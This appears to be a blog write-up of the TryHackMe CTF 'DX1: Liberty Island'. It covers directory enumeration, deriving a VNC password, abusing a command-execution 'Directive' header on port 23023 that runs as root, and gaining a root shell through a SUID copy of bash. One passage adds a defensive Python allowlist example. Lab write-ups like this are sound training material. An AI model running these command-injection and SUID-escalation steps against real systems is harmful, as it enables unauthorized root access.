How to root DX1: Liberty Island – THM – En

Can you help the NSF get a foothold in UNATCO’s system?

 

DX1: Liberty Island is a medium-level CTF from TryHackMe. The web enumeration is instructive because you have to create your own wordlist. The privilege escalation is a bit complex. It is a good CTF for making progress.

Enumeration

Command :

nmap -T5 -p- -sVC 10.10.20.94

There are 3 open ports:

22 – SSH

80 – HTTP

5901 – VNC

23023 – HTTP – UNATCO Liberty Island – Command/Control

 

WEB enumeration on port 80

In the robots.txt file, Nmap shows us the presence of the /datacubes directory. When we go there, the site redirects us to this new URL: http://10.10.20.94/datacubes/0000/

GoBuster

According to the information displayed, these appear to be archived messages. Let’s see if there are others. To find out, we will use Gobuster to walk through the archives: /0001, then /0002, and so on.

Creating a list of numbers:

I did this with Excel to save time from a Windows PC. In a text format cell, you have to put 0000 and pull (+) up to 1000.

Then you have to copy the column into Notepad, then copy-paste its content into a file on Kali, which will then be used with Gobuster.

Video demonstration

Command :

gobuster dir -u http://10.10.20.94/datacubes/ -w num.txt

We have 6 results. I’ll let you look at what is in the others. I’ll go straight to the last one, /0451, the most interesting.

/0451

It is explained that the VNC login on jacobson’s machine is composed of « smashthestate » with a hmac’ed key which is present in the « bad actor » list, all converted with the MD5 hashing algorithm.

Bad Actors

The list can be found on the website at this URL: http://10.10.20.94/badactors.html

The only indication for the username is the initials JL. In the “bad actor” list, the only name with these initials is jlebedev.

 

Creating the VNC password

The website https://www.freeformatter.com/hmac-generator.html allows us to calculate the hash of the password.

Only the first 8 characters should be taken.

Initial foothold - VNCVIEWER

Command :

vncviewer 10.10.20.94:5901

Once connected, there is a badactor-list executable on the desktop.

Running badactor-list

We will run this application to see what happens.

The app does 2 things. It synchronizes with the address http://UNATCO on port 23023 and, once the connection is established, it seems to retrieve the list of Bad Actors.

Recovery of badactor-list locally on Kali.

Setting up a web server with python

Command :

python3.8 -m http.server

Recovery on Kali

Command :

wget http://10.10.20.94:8000/badactors-list

Wireshark and BurpSuite

With the help of Wireshark, we will see what is happening at the network level. You must first modify the HOSTS file, so that the application connects to the right place and therefore retrieves the bad actors list.

Once the capture is finished, we will use the http filter to eliminate all frames linked to VNC.

To see the http request in detail, right-click on it and follow http stream.

In the window that is displayed, we retrieve the communication between Kali and the UNATCO server. We can see that there is a directive command that performs a cat on the file badactors.txt on the URL UNATCO:23023.

We will retrieve this query and rerun it with BurpSuite

Access to URL 10.10.20.94:23023

 

Intercepting the request with BurpSuite

Send the intercepted request to Repeater in BurpSuite and copy the request seen in Wireshark into it.

 

We can see that we are recovering the list of bad actors.

By changing the cat command to the id command, we can see that we have root rights.
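The underlying flaw is that the service on port 23023 runs whatever the Directive value contains, and does so as root. As an added example (not code from the room or from this write-up), here is a handler that accepts only exact allowlisted directives and never calls a shell. The function names, the '<verb> <file>' format and the data directory are assumptions, since the server's implementation is not shown.

```python
"""Allowlist dispatcher for a 'Directive' request value (constructed example)."""
from pathlib import Path


class DirectiveRejected(Exception):
    """Raised when a Directive value is not an exact allowlisted action."""


def read_list(data_dir: Path, name: str) -> bytes:
    # Defence in depth: the resolved path must stay inside data_dir,
    # so a symlink or traversal sequence cannot reach other files.
    base = data_dir.resolve()
    target = (base / name).resolve()
    if base not in target.parents:
        raise DirectiveRejected("path escapes data directory")
    return target.read_bytes()


# verb -> (handler, permitted file names). Hypothetical table: only the
# one action the client legitimately needs is present.
ACTIONS = {"cat": (read_list, {"badactors.txt"})}


def handle_directive(value: str, data_dir: Path) -> bytes:
    """Map a Directive value to a fixed Python handler; no shell is involved."""
    parts = value.split()
    if len(parts) != 2:
        raise DirectiveRejected("expected '<verb> <file>'")
    verb, name = parts
    if verb not in ACTIONS:
        raise DirectiveRejected(f"verb not allowed: {verb!r}")
    handler, names = ACTIONS[verb]
    if name not in names:
        raise DirectiveRejected(f"file not allowed: {name!r}")
    return handler(data_dir, name)


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "badactors.txt").write_bytes(b"constructed-entry\n")
        for value in ("cat badactors.txt", "id", "cp /bin/bash /tmp"):
            try:
                print(value, "->", handle_directive(value, Path(d)))
            except DirectiveRejected as exc:
                print(value, "-> rejected:", exc)
```

Running the service under a dedicated unprivileged account would further limit what any accepted directive can touch.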

Escalation of privilege

The rest then is simple. There are several methods to gain root access.

Command :

Directive : cp /bin/bash /tmp

Directive : cd /tmp

Directive : chmod 7777 /tmp/bash

Then you have to go back to the VNC console, and go to the /tmp folder via the file explorer and run bash through the terminal.

Command :

./bash -p

#

That’s all folks

Thank you for taking the trouble to come to the site to read this write-up.

I hope you found it useful and that it taught you some new things.

Feel free to leave a comment or share this article.
